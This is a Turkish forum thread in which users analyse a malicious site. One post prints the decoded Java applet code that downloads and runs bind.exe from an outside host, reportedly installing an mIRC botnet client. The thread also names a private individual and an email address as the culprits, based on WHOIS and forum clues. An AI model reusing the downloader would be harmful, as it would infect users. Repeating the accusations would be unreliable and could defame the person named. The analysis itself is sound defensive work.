• 17-06-2010, 20:43:34
    #1
    Üyeliği durduruldu
    Sonkralice sitesinde sürekli ben yapmadım diye ısrar etmesi üzerine araştırayım dedim.

    http://sonkralice.freevar.com/ girelim. (Girmeyin botnet var )

    Sitedeki koddaki document.write'yi alert olarak değişip tarayıcıda açtığımızda şu kod çıkıyor:

    <applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
    <param name="url" value="http://www.sonsigaram.com/bind.exe">
    </applet>

    Java bind.exe yükleyip çalıştırıyor.
    bind.exe'yi virtual machinede inceledim, system32'de Help klasörüne mIRC çıkarıyor (botnet),
    sonsigaram.com WHOIS sorgusu yapalım: ns1.yakupkoc.net ns2.yakupkoc.net

    yakupkoc.net girdim: footerde "Theme by heLLz"

    Googleye yazıyorum: http://www.webforumlari.net/members/13-hellz.html site adresi yakupkoc.net
    r10'dakilerde heLLz'in Yakup Koç olduğunu bilir.

    Bu durumda ya bu aralar zaten konuşulan sonkralice diye heLLz sonkralice üzerinden botnet client sağlama amacıyla yapmış böylece suçlu sonkralice olacak (nasıl olsa adı kirlenmiş ya) yada sonkralice ona birşey yapmış, buda iftira atma yoluna başvurmuş..

    heLLz'in açıklama yapması gerekli
    Bu forumda kimse salak değil merak etmeyin

    heLLzde host ediliyor demeyin. Zaten heLLz in botnetçi olduğunu ve host satmadığını neredeyse herkes biliyor..

    Bu arada bir hatırlatma: sonkralice ile hiçbir şekilde tanışıp/konuşmuşluğum yoktur. Sadece bir araştırayım dedim. -Merak-
  • 17-06-2010, 20:47:47
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    dedektif gibi adamsın vallaha
  • 17-06-2010, 20:50:16
    #3
    Olayi cözmüs gibi ama ben yorum yapamam olan biteni bilmedigim icin.
  • 17-06-2010, 20:50:53
    #4
    Üyeliği durduruldu
    Bu kişi benim msnden adresi yolladı.. Java scriptli birşey cıktı. Run ve Cancel seçenekleri felan vardı. Ben Cancel dedim. Adresi buydu

    sonkralice.freevar.com GİRME!


    nl_elif@hotmail.com << Kimde varsa bu msn silin geçin Botnetci kimse o
  • 17-06-2010, 20:55:54
    #5
    Üyeliği durduruldu
    pLive adlı üyeden alıntı: mesajı görüntüle
    Bu kişi benim msnden adresi yolladı.. Java scriptli birşey cıktı. Run ve Cancel seçenekleri felan vardı. Ben Cancel dedim. Adresi buydu

    sonkralice.freevar.com GİRME!


    nl_elif@hotmail.com << Kimde varsa bu msn silin geçin Botnetci kimse o

    heLLz'in fake maili o
  • 17-06-2010, 20:58:15
    #6
    pLive adlı üyeden alıntı: mesajı görüntüle
    Bu kişi benim msnden adresi yolladı.. Java scriptli birşey cıktı. Run ve Cancel seçenekleri felan vardı. Ben Cancel dedim. Adresi buydu

    sonkralice.freevar.com GİRME!


    nl_elif@hotmail.com << Kimde varsa bu msn silin geçin Botnetci kimse o
    Java downloader o kazım.. trojan vs. vs. yedirmek için kullanıyorlar
  • 17-06-2010, 21:01:15
    #7
    Üyeliği durduruldu
    AnTiBiy0tiq adlı üyeden alıntı: mesajı görüntüle
    Java downloader o kazım.. trojan vs. vs. yedirmek için kullanıyorlar
    Kimse bana birşey yediremez Yedirmeye kalkan yer malı
  • 17-06-2010, 21:02:44
    #8
    Üyeliği durduruldu
    pLive adlı üyeden alıntı: mesajı görüntüle
    Kimse bana birşey yediremez Yedirmeye kalkan yer malı
    r10un salak olduğunu sandı sanırım javayı yiyeceğiz

    Bu arada botnet tehdit için site adresi isteyecekler buradan buyrun
  • 17-06-2010, 21:05:12
    #9
    yakında dedektiflik sertifikası alıcaz r10 olarak